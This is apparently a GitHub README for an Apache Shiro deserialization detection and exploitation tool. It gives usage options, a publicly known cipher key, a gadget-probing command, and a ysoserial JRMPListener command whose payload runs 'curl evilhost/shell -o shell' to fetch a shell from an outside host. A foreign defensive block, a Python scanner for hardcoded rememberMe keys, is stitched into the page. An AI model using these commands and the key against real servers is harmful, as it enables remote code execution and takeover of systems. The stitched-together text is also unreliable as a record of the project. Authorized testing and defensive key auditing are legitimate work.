insightglacier / Shiro_exploit

Apache Shiro deserialization vulnerability detection and exploitation tool

Shiro_exploit

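Shiro_exploit is a script for detecting and exploiting the Apache Shiro deserialization vulnerability. It can help companies find their own security vulnerabilities.

The script uses 22 keys collected from the internet and the URLDNS gadget from the ysoserial tool, combined with a dnslog platform, to detect the vulnerability. For exploitation, the gadget and its parameters can be chosen, which adds flexibility.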
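
A defender-side check for the weakness this detection relies on, as an added example that is not part of the Shiro_exploit project: it scans configuration text for a hardcoded rememberMe cipher key and flags the key shown on this page, whether it is written as Base64 or as hex. The sample lines, the `audit` and `decode_key` names and the one-entry key list are assumptions made for illustration.

```python
import base64
import re

# Only key value that appears on this page; extend with your own list of
# publicly circulated keys (assumption: each entry is a Base64 string).
KNOWN_PUBLIC_KEYS = {base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")}

# "cipherKey = <value>" in ini/properties files, setCipherKey(...) in Java.
PATTERNS = [
    re.compile(r'cipherKey\s*[=:]\s*"?([A-Za-z0-9+/=]+)', re.I),
    re.compile(r'setCipherKey\s*\(.*?"([A-Za-z0-9+/=]+)"', re.I),
]

def decode_key(value):
    """Raw key bytes from a 0x-prefixed hex or Base64 literal, else None."""
    try:
        if value.lower().startswith("0x"):
            return bytes.fromhex(value[2:])
        return base64.b64decode(value, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None

def audit(text):
    """Return (line_number, status) for each hardcoded rememberMe key."""
    findings = []
    for number, line in enumerate(text.splitlines(), 1):
        match = next((m for m in (p.search(line) for p in PATTERNS) if m), None)
        if match is None:
            continue
        key = decode_key(match.group(1))
        status = ("unparsed" if key is None else
                  "known-public" if key in KNOWN_PUBLIC_KEYS else "hardcoded")
        findings.append((number, status))
    return findings

# Constructed sample configuration lines (not taken from any real system).
SAMPLE = "\n".join([
    "[main]",
    "securityManager.rememberMeManager.cipherKey = kPH+bIxk5D2deZiIxcaaaA==",
    "securityManager.rememberMeManager.cipherKey = 0x"
    + next(iter(KNOWN_PUBLIC_KEYS)).hex(),
    'manager.setCipherKey(Base64.decode("kPH+bIxk5D2deZiIxcaaaA=="));',
    "securityManager.rememberMeManager.cipherKey = "
    + base64.b64encode(b"constructed-key!").decode(),
])

if __name__ == "__main__":
    for number, status in audit(SAMPLE):
        print(number, status)
```

A "known-public" result means the key should be replaced with a randomly generated one; "hardcoded" marks a key that is not on the list but still lives in configuration or source and deserves review.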

Environment

Python2.7

requests

Jdk 1.8

Usage

usage: shiro_exploit.py [-h] -u URL [-t TYPE] [-g GADGET] [-p PARAMS] [-k KEY]

OPTIONS:
-h, --help            show this help message and exit
-u URL, --url URL     Target url.
-t TYPE, --type TYPE  Check or Exploit. Check :1 , Exploit:2 , Find gadget:3
-g GADGET, --gadget GADGET
                        gadget
-p PARAMS, --params PARAMS
                        gadget params
-k KEY, --key KEY     CipherKey

Example: python shiro_exploit.py -u target

By default, detection only needs the -u parameter.

To find out which gadgets are usable, run:

python shiro_exploit.py -u http://target/ -t 3 -p "ping -c 2 {dnshost}" -k "kPH+bIxk5D2deZiIxcaaaA=="

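At run time the program obtains a dnslog domain and substitutes it for {dnshost}; this value does not need to be changed. Compatibility between Windows and Linux systems has not been solved yet, so specify -p yourself according to the actual situation.

Detecting usable gadgets

For exploitation, the JRMP approach can be used. Exploitation can also be based on the gadget found during detection.

Server: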

java -cp ysoserial-master-SNAPSHOT.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections5 'curl evilhost/shell -o shell'

Local:

python shiro_exploit.py -u http://target/ -t 2 -g JRMPClient -p "remote_host:1099" -k "kPH+bIxk5D2deZiIxcaaaA=="

FAQ

  1. No module named 'Crypto' appears at run time

Run the following commands:

pip uninstall crypto pycryptodome
pip install pycryptodome

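In \Lib\site-packages under the Python installation directory, rename the crypto folder to Crypto.

For any other problems or suggestions, please submit an issue.

The approach behind the tool is described in my blog post: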

https://www.bacde.me/post/Apache-Shiro-Deserialize-Vulnerability/

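Note: please do not use this script for illegal purposes. It is only for lawful, authorized penetration testing, internal company security checks and research. I am not responsible for any adverse consequences arising from use of the tool.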
